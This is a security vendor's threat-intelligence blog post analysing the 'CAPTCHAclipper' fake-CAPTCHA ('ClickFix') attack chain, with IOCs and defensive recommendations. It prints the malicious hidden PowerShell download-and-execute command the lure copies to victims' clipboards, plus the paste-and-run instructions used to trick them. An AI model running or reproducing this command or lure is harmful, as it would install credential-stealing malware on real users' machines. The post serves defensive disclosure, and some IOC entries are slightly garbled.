From CAPTCHA to Compromise: New CAPTCHAclipper Cyber Attack Exposed

Conscia SOC team uncovered a new attack exploiting CAPTCHA prompts. The “CAPTCHAclipper” attack blends social engineering and technical sophistication to deploy malware. Read our analysis to understand the attack chain, IOCs, and actionable defenses.

The Conscia Security Operations Center (SOC) team recently uncovered a meticulously crafted attack chain executed by a threat actor leveraging a seemingly innocuous CAPTCHA prompt.

This attack, which we’ve dubbed CAPTCHAclipper, exemplifies the convergence of social engineering and technical sophistication to compromise victims’ systems and exfiltrate sensitive data.

We observed the same TTPs in three distinct attacks over the course of one month, all within the European geographical region.

Due to the nature of the attack chain, we suspect a sophisticated threat actor is behind these attacks. However, we cannot provide any attribution at the time of writing. The main payload is probably a variant of LummaC2 malware.

When we first investigated the incident, the provided IOCs were not flagged as malicious, indicating the usage of novel TTPs. However, as of publishing this article, we can already see certain AV Engines recognizing at least some of the IOCs, but they can easily be altered and repurposed.

Below, we discuss different stages of the attack chain.

Analysis of Attack Chain

Stage 1: The Malicious CAPTCHA Lure

The attack began with a targeted lure: users were directed to a malicious, but legitimate-looking, website hosting a PDF file that the user was presented to download in a phishing lure. Before being able to download the file, the victim is presented with interactive CAPTCHA.

Figure 1 - Legitimate-looking CAPTCHA is presented to victim
Figure 1 – Legitimate-looking CAPTCHA is presented to victim

This initial step served a dual purpose:

  1. It established a layer of trust by mimicking legitimate verification methods.
  2. It initiated the first technical exploit via JavaScript, which we also recognize as ‘ClickFix’ or ‘paste and run’ technique.

When users engaged with the CAPTCHA to access a promised PDF file, a malicious JavaScript payload silently executed in the background.

This script copied a PowerShell command to the system clipboard, preparing the ground for the next stage:

powershell -WindowStyle Hidden -Command “$rQd=‘https://s3-scw-tx.b-cdn[.]net/prizev2[.]txt’; $pLs=New-Object System.Net.WebClient; $sLf=$pLs.DownloadString($rQd); Invoke-Expression $sLf;”
Figure 2 - HTML code shows embedded JavaScript that copies malicious command to clipboard
Figure 2 – HTML code shows embedded JavaScript that copies malicious command to clipboard

Stage 2: Social Engineering with Malicious Instructions

After completing the CAPTCHA, victims received a notification for verification steps before being able to download the file. In order to download it, the victim had to follow the provided instructions, which were critical to the attack’s success.

  1. Press Win+R to open the Run dialog.
  2. Press CTRL+V to paste the clipboard command (not knowingly).
  3. Press Enter.
Figure 3 - Victim is introduced with fake verification steps to lure them initiating the attack chain
Figure 3 – Victim is introduced with fake verification steps to lure them initiating the attack chain

This seemingly benign command was, in reality, a carefully engineered delivery mechanism. It:

  • Downloaded a malicious script: prizev2.txt from a remote server.
  • Executed the script entirely in memory, bypassing file-based detections.

Stage 3: Deployment of Malicious Payload

 The downloaded script carried out multiple tasks to prepare for further exploitation:

  1. Retrieved a ZIP file (prize.zip) from https://fixedzip.oss-ap-southeast-5.aliyuncs.com.
  2. Extracted the ZIP file contents into a randomly generated folder within the APPDATA directory.
  3. Launched the executable setup.exe, initiating the attack’s next phase.
Figure 4 - the main payload is dropped as Setup.exe in APPDATA directory
Figure 4 – the main payload is dropped as Setup.exe in APPDATA directory

The use of the APPDATA directory ensured minimal visibility to routine security scans, emphasizing the actor’s focus on evasion.

Stage 4: Malicious Activities of Setup.exe

The executable Setup.exe was a potent tool designed for both immediate impact and long-term persistence. Its TTPs included:

  • Credential Theft: Extracting login credentials stored in browser files (Login Data) for different browser at their typical file location.
  • Reconnaissance: Identifying installed antivirus and endpoint protection software to evade detection or disable defenses.
  • Command-and-Control (C2) Communication: Establishing an outbound connection to 21.4.107:443, linked to the domain sliperyedhby.icu. This connection facilitated data exfiltration and allowed further commands from the attacker.
  • Persistence Mechanisms: Registering itself in the Windows Task Scheduler for automatic execution after system reboots. Creating an additional file (69HT8K.pif), potentially as a decoy or a secondary stage.

Indicators of Compromise (IOCs)

File Artifacts
File Name SHA-256
Setup.exe
  • d19f31a0c9926824ed9554b254804ab805c8d2d5bc68b4b129e7ef520a673feb
  • 8ce1cde3bd1fa945af8e03459775a87dba7275c17401ab19e525b3238609f6b
Autolt3.exe
  • 1da298cab4d537b0b7b5dabf09bff6a212b9e45731e0cc772f99026005fb9e48

 

Networking Artifacts
Domains:
  • https://s3-scw-tx.b-cdn[.]net
  • https://fixedzip.oss-ap-southeast-5.aliyuncs[.]com
  • https://dirverif.oss-ap-southeast-5.aliyuncs[.]com/checkpoint/finished/gnerous.txtsliperyedhby[.]icu
IP Address:
  • 104.21.4.107

Implications and Lessons Learned

The CAPTCHAclipper attack highlights a sophisticated, multi-layered approach to compromising systems:

  • User Interaction as an Attack Vector: The reliance on user-driven actions (copy-pasting commands) exemplifies the effectiveness of social engineering.
  • Memory-Based Execution: Executing payloads in memory minimized detection by traditional antivirus solutions.
  • Persistence and Exfiltration: Establishing persistence ensured long-term access, while C2 communication enabled data theft and remote control.

Effective defense strategies

The CaptchaClipper attack is a reminder of the evolving tactics employed by cyber adversaries. Its blend of technical ingenuity and psychological manipulation demonstrates the importance of proactive defense strategies. By leveraging social engineering and multi-stage infection techniques, attackers effectively bypass traditional defenses and exploit user trust.

To defend against such sophisticated threats, Conscia SOC recommends that organizations adopt a multi-faceted cybersecurity approach: 

  1. User Awareness Training: Conduct regular training sessions to help employees recognize phishing and other social engineering techniques.
  2. Enable Endpoint Detection and Response (EDR): Deploy solutions that can identify and mitigate fileless malware and suspicious PowerShell activity.
  3. Employ continuous monitoring of security events: Deploying security solutions is not enough, if you do not have analysts looking over the potential incidents. The timeliness of detection is crucial in these types of attacks as most of the attack chain is automated.
  4. Restrict PowerShell Usage: Limit PowerShell execution to signed scripts only, and monitor PowerShell activity closely.
  5. Network Monitoring and Data Leak Detection: Implement network monitoring tools to detect unusual outbound connections to C2 servers or unauthorized data exfiltration.
  6. Incident Response Planning: Ensure your team is prepared to respond to multi-stage infections with a clear remediation strategy.

In addition to that, we also encourage all cybersecurity professionals to actively participate in the cybersecurity community. You can: 

  • Collaborate and Share Intelligence: Share insights and indicators of compromise (IOCs) with trusted communities to help combat similar threats.
  • Report and Investigate: If you detect similar activity, report it to your threat intelligence providers or national cybersecurity bodies to track emerging trends.
  • Enhance Threat Hunting: Leverage this analysis as a use case to improve threat-hunting capabilities within your organization.

 

Contact
Contact us now